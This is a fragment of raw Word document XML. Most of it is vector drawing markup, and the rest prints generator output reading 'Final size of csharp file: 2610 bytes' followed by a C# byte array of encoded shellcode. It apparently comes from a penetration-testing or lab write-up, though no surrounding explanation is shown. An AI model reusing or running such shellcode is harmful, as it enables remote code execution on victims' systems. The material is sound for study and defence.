        <v:shape style="position:absolute;left:1177;top:8497;width:82;height:322" coordorigin="1177,8497" coordsize="82,322" path="m1217,8503l1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8505,1217,8505,1217,8505,1217,8505,1217,8505,1217,8506,1217,8506,1217,8506,1217,8507,1217,8507,1217,8508,1217,8508,1217,8509,1217,8509,1217,8510,1217,8510,1217,8511,1217,8512,1217,8512,1217,8513,1217,8514,1217,8515,1217,8516,1217,8516,1217,8517,1217,8518,1217,8520,1217,8521,1217,8522,1217,8523,1217,8524,1217,8526,1217,8527,1217,8528,1217,8530,1217,8531,1217,8533,1217,8535,1217,8536,1217,8538,1217,8540,1217,8542,1217,8544,1217,8546,1217,8548,1217,8550,1217,8552,1217,8554,1217,8557,1217,8559,1217,8562,1217,8564,1217,8567,1217,8570,1217,8573,1217,8575,1217,8578,1217,8581,1217,8585,1217,8588,1217,8591,1217,8594,1217,8598,1217,8601,1217,8605,1217,8609,1217,8613,1217,8617,1217,8621,1217,8625,1217,8629,1217,8633,1217,8638,1217,8642,1217,8647,1217,8651,1217,8656,1217,8661,1217,8666,1217,8671,1217,8676,1217,8681,1217,8687,1217,8692,1217,8698,1217,8704,1217,8709,1217,8715,1217,8721,1217,8728,1217,8734,1217,8740,1217,8747,1217,8754,1217,8760,1217,8767,1217,8774,1217,8781,1217,8789,1217,8796,1217,8803e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:439.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8797" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8797;width:82;height:322" coordorigin="1177,8797" coordsize="82,322" path="m1217,8803l1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8805,1217,8805,1217,8805,1217,8805,1217,8806,1217,8806,1217,8806,1217,8807,1217,8807,1217,8807,1217,8808,1217,8808,1217,8809,1217,8809,1217,8810,1217,8810,1217,8811,1217,8812,1217,8812,1217,8813,1217,8814,1217,8815,1217,8816,1217,8817,1217,8818,1217,8819,1217,8820,1217,8821,1217,8822,1217,8823,1217,8824,1217,8826,1217,8827,1217,8828,1217,8830,1217,8831,1217,8833,1217,8835,1217,8836,1217,8838,1217,8840,1217,8842,1217,8844,1217,8846,1217,8848,1217,8850,1217,8852,1217,8855,1217,8857,1217,8859,1217,8862,1217,8865,1217,8867,1217,8870,1217,8873,1217,8876,1217,8879,1217,8882,1217,8885,1217,8888,1217,8891,1217,8895,1217,8898,1217,8902,1217,8905,1217,8909,1217,8913,1217,8917,1217,8921,1217,8925,1217,8929,1217,8933,1217,8938,1217,8942,1217,8947,1217,8951,1217,8956,1217,8961,1217,8966,1217,8971,1217,8976,1217,8982,1217,8987,1217,8992,1217,8998,1217,9004,1217,9010,1217,9016,1217,9022,1217,9028,1217,9034,1217,9041,1217,9047,1217,9054,1217,9060,1217,9067,1217,9074,1217,9081,1217,9089,1217,9096,1217,9104e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:454.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9097;width:82;height:322" coordorigin="1177,9097" coordsize="82,322" path="m1217,9104l1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9105,1217,9105,1217,9105,1217,9105,1217,9105,1217,9106,1217,9106,1217,9106,1217,9107,1217,9107,1217,9107,1217,9108,1217,9108,1217,9109,1217,9109,1217,9110,1217,9111,1217,9111,1217,9112,1217,9113,1217,9113,1217,9114,1217,9115,1217,9116,1217,9117,1217,9118,1217,9119,1217,9120,1217,9121,1217,9122,1217,9123,1217,9125,1217,9126,1217,9127,1217,9129,1217,9130,1217,9132,1217,9133,1217,9135,1217,9137,1217,9138,1217,9140,1217,9142,1217,9144,1217,9146,1217,9148,1217,9150,1217,9153,1217,9155,1217,9157,1217,9160,1217,9162,1217,9165,1217,9167,1217,9170,1217,9173,1217,9176,1217,9179,1217,9182,1217,9185,1217,9188,1217,9191,1217,9195,1217,9198,1217,9202,1217,9205,1217,9209,1217,9213,1217,9217,1217,9221,1217,9225,1217,9229,1217,9233,1217,9238,1217,9242,1217,9247,1217,9252,1217,9256,1217,9261,1217,9266,1217,9271,1217,9276,1217,9282,1217,9287,1217,9293,1217,9298,1217,9304,1217,9310,1217,9316,1217,9322,1217,9328,1217,9334,1217,9341,1217,9347,1217,9354,1217,9361,1217,9367,1217,9374,1217,9382,1217,9389,1217,9396,1217,9404e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:469.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9397;width:82;height:322" coordorigin="1177,9397" coordsize="82,322" path="m1217,9404l1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9405,1217,9405,1217,9405,1217,9405,1217,9405,1217,9406,1217,9406,1217,9406,1217,9407,1217,9407,1217,9407,1217,9408,1217,9408,1217,9409,1217,9409,1217,9410,1217,9410,1217,9411,1217,9411,1217,9412,1217,9413,1217,9414,1217,9414,1217,9415,1217,9416,1217,9417,1217,9418,1217,9419,1217,9420,1217,9421,1217,9422,1217,9423,1217,9425,1217,9426,1217,9427,1217,9429,1217,9430,1217,9432,1217,9433,1217,9435,1217,9437,1217,9438,1217,9440,1217,9442,1217,9444,1217,9446,1217,9448,1217,9450,1217,9453,1217,9455,1217,9457,1217,9460,1217,9462,1217,9465,1217,9467,1217,9470,1217,9473,1217,9476,1217,9479,1217,9482,1217,9485,1217,9488,1217,9492,1217,9495,1217,9498,1217,9502,1217,9506,1217,9509,1217,9513,1217,9517,1217,9521,1217,9525,1217,9529,1217,9534,1217,9538,1217,9542,1217,9547,1217,9552,1217,9556,1217,9561,1217,9566,1217,9571,1217,9577,1217,9582,1217,9587,1217,9593,1217,9598,1217,9604,1217,9610,1217,9616,1217,9622,1217,9628,1217,9634,1217,9641,1217,9647,1217,9654,1217,9661,1217,9668,1217,9675,1217,9682,1217,9689,1217,9696,1217,9704e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:484.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9697" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9697;width:82;height:322" coordorigin="1177,9697" coordsize="82,322" path="m1217,9704l1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9705,1217,9705,1217,9705,1217,9705,1217,9705,1217,9706,1217,9706,1217,9706,1217,9706,1217,9707,1217,9707,1217,9707,1217,9708,1217,9708,1217,9709,1217,9709,1217,9710,1217,9710,1217,9711,1217,9712,1217,9712,1217,9713,1217,9714,1217,9714,1217,9715,1217,9716,1217,9717,1217,9718,1217,9719,1217,9720,1217,9721,1217,9722,1217,9724,1217,9725,1217,9726,1217,9728,1217,9729,1217,9730,1217,9732,1217,9734,1217,9735,1217,9737,1217,9739,1217,9740,1217,9742,1217,9744,1217,9746,1217,9748,1217,9751,1217,9753,1217,9755,1217,9757,1217,9760,1217,9762,1217,9765,1217,9768,1217,9770,1217,9773,1217,9776,1217,9779,1217,9782,1217,9785,1217,9788,1217,9792,1217,9795,1217,9799,1217,9802,1217,9806,1217,9809,1217,9813,1217,9817,1217,9821,1217,9825,1217,9829,1217,9834,1217,9838,1217,9843,1217,9847,1217,9852,1217,9857,1217,9861,1217,9866,1217,9872,1217,9877,1217,9882,1217,9887,1217,9893,1217,9899,1217,9904,1217,9910,1217,9916,1217,9922,1217,9928,1217,9935,1217,9941,1217,9947,1217,9954,1217,9961,1217,9968,1217,9975,1217,9982,1217,9989,1217,9997,1217,10004e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:499.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9997;width:82;height:322" coordorigin="1177,9997" coordsize="82,322" path="m1217,10004l1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10006,1217,10006,1217,10006,1217,10007,1217,10007,1217,10007,1217,10008,1217,10008,1217,10008,1217,10009,1217,10009,1217,10010,1217,10010,1217,10011,1217,10012,1217,10012,1217,10013,1217,10014,1217,10015,1217,10015,1217,10016,1217,10017,1217,10018,1217,10019,1217,10020,1217,10021,1217,10023,1217,10024,1217,10025,1217,10026,1217,10028,1217,10029,1217,10031,1217,10032,1217,10034,1217,10035,1217,10037,1217,10039,1217,10041,1217,10043,1217,10044,1217,10046,1217,10049,1217,10051,1217,10053,1217,10055,1217,10058,1217,10060,1217,10063,1217,10065,1217,10068,1217,10071,1217,10073,1217,10076,1217,10079,1217,10082,1217,10085,1217,10089,1217,10092,1217,10095,1217,10099,1217,10102,1217,10106,1217,10110,1217,10113,1217,10117,1217,10121,1217,10125,1217,10130,1217,10134,1217,10138,1217,10143,1217,10147,1217,10152,1217,10157,1217,10162,1217,10167,1217,10172,1217,10177,1217,10182,1217,10188,1217,10193,1217,10199,1217,10204,1217,10210,1217,10216,1217,10222,1217,10228,1217,10235,1217,10241,1217,10248,1217,10254,1217,10261,1217,10268,1217,10275,1217,10282,1217,10289,1217,10297,1217,10304e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:514.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10297;width:82;height:322" coordorigin="1177,10297" coordsize="82,322" path="m1217,10304l1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10306,1217,10306,1217,10306,1217,10306,1217,10307,1217,10307,1217,10307,1217,10308,1217,10308,1217,10309,1217,10309,1217,10309,1217,10310,1217,10311,1217,10311,1217,10312,1217,10313,1217,10313,1217,10314,1217,10315,1217,10316,1217,10316,1217,10317,1217,10318,1217,10319,1217,10320,1217,10322,1217,10323,1217,10324,1217,10325,1217,10326,1217,10328,1217,10329,1217,10331,1217,10332,1217,10334,1217,10335,1217,10337,1217,10339,1217,10341,1217,10343,1217,10345,1217,10347,1217,10349,1217,10351,1217,10353,1217,10355,1217,10358,1217,10360,1217,10363,1217,10365,1217,10368,1217,10371,1217,10373,1217,10376,1217,10379,1217,10382,1217,10386,1217,10389,1217,10392,1217,10395,1217,10399,1217,10402,1217,10406,1217,10410,1217,10414,1217,10417,1217,10421,1217,10426,1217,10430,1217,10434,1217,10438,1217,10443,1217,10447,1217,10452,1217,10457,1217,10462,1217,10467,1217,10472,1217,10477,1217,10482,1217,10488,1217,10493,1217,10499,1217,10505,1217,10510,1217,10516,1217,10522,1217,10529,1217,10535,1217,10541,1217,10548,1217,10554,1217,10561,1217,10568,1217,10575,1217,10582,1217,10589,1217,10597,1217,10604e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:529.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10597" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10597;width:82;height:322" coordorigin="1177,10597" coordsize="82,322" path="m1217,10604l1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10606,1217,10606,1217,10606,1217,10606,1217,10607,1217,10607,1217,10607,1217,10607,1217,10608,1217,10608,1217,10609,1217,10609,1217,10610,1217,10610,1217,10611,1217,10611,1217,10612,1217,10613,1217,10613,1217,10614,1217,10615,1217,10616,1217,10617,1217,10618,1217,10619,1217,10620,1217,10621,1217,10622,1217,10623,1217,10624,1217,10625,1217,10627,1217,10628,1217,10629,1217,10631,1217,10632,1217,10634,1217,10636,1217,10637,1217,10639,1217,10641,1217,10643,1217,10645,1217,10647,1217,10649,1217,10651,1217,10653,1217,10656,1217,10658,1217,10660,1217,10663,1217,10665,1217,10668,1217,10671,1217,10674,1217,10677,1217,10679,1217,10683,1217,10686,1217,10689,1217,10692,1217,10696,1217,10699,1217,10703,1217,10706,1217,10710,1217,10714,1217,10718,1217,10722,1217,10726,1217,10730,1217,10734,1217,10739,1217,10743,1217,10748,1217,10752,1217,10757,1217,10762,1217,10767,1217,10772,1217,10777,1217,10782,1217,10788,1217,10793,1217,10799,1217,10805,1217,10811,1217,10816,1217,10823,1217,10829,1217,10835,1217,10841,1217,10848,1217,10855,1217,10861,1217,10868,1217,10875,1217,10882,1217,10890,1217,10897,1217,10904e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:544.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10897" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10897;width:82;height:322" coordorigin="1177,10897" coordsize="82,322" path="m1217,10904l1217,10904,1217,10904,1217,10904,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10906,1217,10906,1217,10906,1217,10906,1217,10906,1217,10907,1217,10907,1217,10907,1217,10908,1217,10908,1217,10908,1217,10909,1217,10909,1217,10910,1217,10910,1217,10911,1217,10911,1217,10912,1217,10913,1217,10914,1217,10914,1217,10915,1217,10916,1217,10917,1217,10918,1217,10919,1217,10920,1217,10921,1217,10922,1217,10923,1217,10924,1217,10925,1217,10927,1217,10928,1217,10930,1217,10931,1217,10933,1217,10934,1217,10936,1217,10937,1217,10939,1217,10941,1217,10943,1217,10945,1217,10947,1217,10949,1217,10951,1217,10953,1217,10956,1217,10958,1217,10960,1217,10963,1217,10966,1217,10968,1217,10971,1217,10974,1217,10977,1217,10980,1217,10983,1217,10986,1217,10989,1217,10992,1217,10996,1217,10999,1217,11003,1217,11006,1217,11010,1217,11014,1217,11018,1217,11022,1217,11026,1217,11030,1217,11034,1217,11039,1217,11043,1217,11048,1217,11052,1217,11057,1217,11062,1217,11067,1217,11072,1217,11077,1217,11083,1217,11088,1217,11094,1217,11099,1217,11105,1217,11111,1217,11117,1217,11123,1217,11129,1217,11135,1217,11142,1217,11148,1217,11155,1217,11161,1217,11168,1217,11175,1217,11183,1217,11190,1217,11197,1217,11205e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:559.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11197" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11197;width:82;height:322" coordorigin="1177,11197" coordsize="82,322" path="m1217,11205l1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11206,1217,11206,1217,11206,1217,11206,1217,11206,1217,11207,1217,11207,1217,11207,1217,11207,1217,11208,1217,11208,1217,11209,1217,11209,1217,11209,1217,11210,1217,11210,1217,11211,1217,11212,1217,11212,1217,11213,1217,11214,1217,11214,1217,11215,1217,11216,1217,11217,1217,11218,1217,11219,1217,11220,1217,11221,1217,11222,1217,11223,1217,11224,1217,11226,1217,11227,1217,11228,1217,11230,1217,11231,1217,11233,1217,11234,1217,11236,1217,11238,1217,11239,1217,11241,1217,11243,1217,11245,1217,11247,1217,11249,1217,11251,1217,11254,1217,11256,1217,11258,1217,11261,1217,11263,1217,11266,1217,11268,1217,11271,1217,11274,1217,11277,1217,11280,1217,11283,1217,11286,1217,11289,1217,11292,1217,11296,1217,11299,1217,11303,1217,11306,1217,11310,1217,11314,1217,11318,1217,11322,1217,11326,1217,11330,1217,11334,1217,11339,1217,11343,1217,11348,1217,11353,1217,11357,1217,11362,1217,11367,1217,11372,1217,11377,1217,11383,1217,11388,1217,11394,1217,11399,1217,11405,1217,11411,1217,11417,1217,11423,1217,11429,1217,11435,1217,11442,1217,11448,1217,11455,1217,11462,1217,11469,1217,11476,1217,11483,1217,11490,1217,11497,1217,11505e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:574.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11497;width:82;height:322" coordorigin="1177,11497" coordsize="82,322" path="m1217,11505l1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11506,1217,11506,1217,11506,1217,11506,1217,11506,1217,11506,1217,11507,1217,11507,1217,11507,1217,11508,1217,11508,1217,11508,1217,11509,1217,11509,1217,11510,1217,11510,1217,11511,1217,11511,1217,11512,1217,11512,1217,11513,1217,11514,1217,11515,1217,11515,1217,11516,1217,11517,1217,11518,1217,11519,1217,11520,1217,11521,1217,11522,1217,11523,1217,11524,1217,11526,1217,11527,1217,11528,1217,11530,1217,11531,1217,11533,1217,11534,1217,11536,1217,11538,1217,11540,1217,11541,1217,11543,1217,11545,1217,11547,1217,11549,1217,11551,1217,11554,1217,11556,1217,11558,1217,11561,1217,11563,1217,11566,1217,11569,1217,11571,1217,11574,1217,11577,1217,11580,1217,11583,1217,11586,1217,11589,1217,11593,1217,11596,1217,11599,1217,11603,1217,11607,1217,11610,1217,11614,1217,11618,1217,11622,1217,11626,1217,11630,1217,11635,1217,11639,1217,11643,1217,11648,1217,11653,1217,11658,1217,11662,1217,11667,1217,11672,1217,11678,1217,11683,1217,11688,1217,11694,1217,11699,1217,11705,1217,11711,1217,11717,1217,11723,1217,11729,1217,11735,1217,11742,1217,11748,1217,11755,1217,11762,1217,11769,1217,11776,1217,11783,1217,11790,1217,11797,1217,11805e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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5" w:lineRule="auto"/>
        <w:ind w:left="1495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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r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of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="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csharp</w:t>
      </w:r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file:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2610</w:t>
      </w:r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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2637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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="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1"/>
          <w:szCs w:val="2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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte[509]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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0xd9,0xcc,0xd9,0x74,0x24,0xf4,0x5a,0xb8,0x76,0x1e,0x3d,0x54,0x2b,0xc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9,0xb1,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0x79,0x83,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0xc2,0x04,0x31,0x42,0x15,0x03,0x42,0x15,0x94,0xeb,0x83,0x64,0x7e,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0x17,0xee,0x5e,0xa8,0xce,0x7a,0x7b,0xa0,0xae,0xa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b,0x4a,0xf9,0x23,0x2f,0xa3,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0x05,0xf2,0x58,0x2d,0xf6,0x82,0xb7,0xaf,0x3d,0x91,0x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7c,0x80,0x6a,0xd8,0xba,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0x3b,0x5a,0xda,0xb6,0xca,0xc8,0x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eb,0x0d,0x8c,0x2a,0x94,0xc2,0x85,0x87,0xbc,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0x25,0xd1,0x6e,0x64,0xfe,0xc0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,0xf6,0x5e,0x9f,0x15,0x80,0x17,0x8f,0xaa,0xae,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0xff,0x22,0x6b,0x6b,0x46,0x14,0x4c,0x66,0x50,0xcb,0x1f,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x29,0x00,0x27,0x4c,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0x19,0x12,0x09,0x98,0x38,0x3e,0x6c,0xa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2,0x22,0x60,0xbf,0x99,0xdb,0xe7,0xc5,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0xa2,0x46,0x18,0xbd,0xc4,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0xae,0xd7,0x82,0xe3,0xbd,0xfe,0x40,0x33,0xf6,0xd2,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0x7a,0x6b,0xe1,0x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2f,0xf9,0x4b,0x8b,0xc3,0x57,0x26,0xfe,0xfd,0x91,0xf7,0x93,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0x4a,0xe1,0x85,0xeb,0x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68,0x16,0x42,0xc9,0x6f,0xac,0xef,0x28,0x05,0x46,0x76,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0x1b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,0xa3,0xb9,0xe9,0xbf,0x1a,0x56,0x3e,0xdc,0x4d,0xf3,0x9f,0x1b,0x09,0x55,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0x63,0x07,0xa3,0x59,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0xbc,0x57,0xad,0x72,0x53,0x6b,0xff,0x49,0x10,0x47,0x21,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0x81,0xb8,0x0e,0x98,0xec,0x03,0x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a3,0x9f,0x90,0xa3,0x15,0xc4,0x7d,0x87,0x5c,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0xcd,0xfe,0x32,0xca,0x11,0xf3,0x14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,0x20,0xc8,0x92,0x36,0x88,0xe8,0xa1,0xad,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0xac,0x46,0x19,0x9f,0x04,0x76,0x01,0x4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1,0x3d,0x3a,0x7d,0x80,0xa2,0x4e,0x24,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0xcb,0x6b,0xe7,0xc9,0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xc8,0xa4,0x01,0x17,0xb3,0x3a,0xd9,0x8e,0x9b,0x13,0x7b,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0xbf,0x49,0xf3,0xa9,0x71,0x57,0x49,0x54,0x60,0x32,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xf4,0x4e,0xfa,0x76,0xf8,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0x38,0x7c,0xb7,0x6b,0xac,0xc1,0x27,0x6b,0xae,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0x80,0x10,0x85,0x98,0x61,0x42,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0x1e,0x1e,0xb0,0x58,0x6b,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0xff,0x92,0x68,0xa5,0x29,0x45,0x99,0x9c,0xa2,0xc0,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0x29,0x53,0xc3,0x4b,0x76,0x72,0x1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7,0x60,0x3d,0xd8,0x11,0xce,0xc0,0xe6,0x34,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0xa1,0x26,0x65,0x98,0x79,0xf6,0x58,0x92,0x41,0x04,0xa0,0xf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0,0x3d,0xf1,0x44,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0xb9,0x63,0x42,0x1a,0xac,0xad,0x67,0x98,0x8f,0x27,0x73,0x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dd,0x54,0x61,0x65,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0xd1,0x72,0xc5,0x0f,0x8a,0x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d3,0x80,0x6a,0xc3,0xf6,0x44,0x2f,0x1a,0x6a,0xe6,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0xfa,0x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6c,0xa5,0x95,0x54,0x47,0x54,0xbf,0x66,0x78,0xfd,0x40,0x10,0x62,0xe8,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0xc0,0x93,0xa8,0x80,0xb9,0x37,0x4c,0x47,0x7b,0x61,0xc1,0x44,0x13,0x17,0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7f,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0xa2,0x73,0xcd,0x76,0x5f,0x2a,0x98,0x92,0x3e,0x09,0xa3,0x60,0x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eb,0x41,0x1a,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0xf4,0xcb,0x6f,0x96,0xc6,0x3c,0xf0,0xda,0xc6,0x1c,0x1c,0xb6,0xa0,0x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,0x67,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0x7b,0xdc,0xe2,0x43,0xf1,0xee,0x3b,0x93,0xb9,0x95,0x2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9,0x01,0x97,0x8c,0x09,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0x72,0xee,0x78,0x1a,0x13,0x60,0xa6,0xac,0x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05,0x99,0x6c,0x28,0x81,0x29,0x5d,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0x37,0x89,0x2a,0x3d,0xbf,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0x0e,0xc7,0xeb,0x9f,0x44,0x1d,0xb3,0x4d,0x1a,0xbc,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1"/>
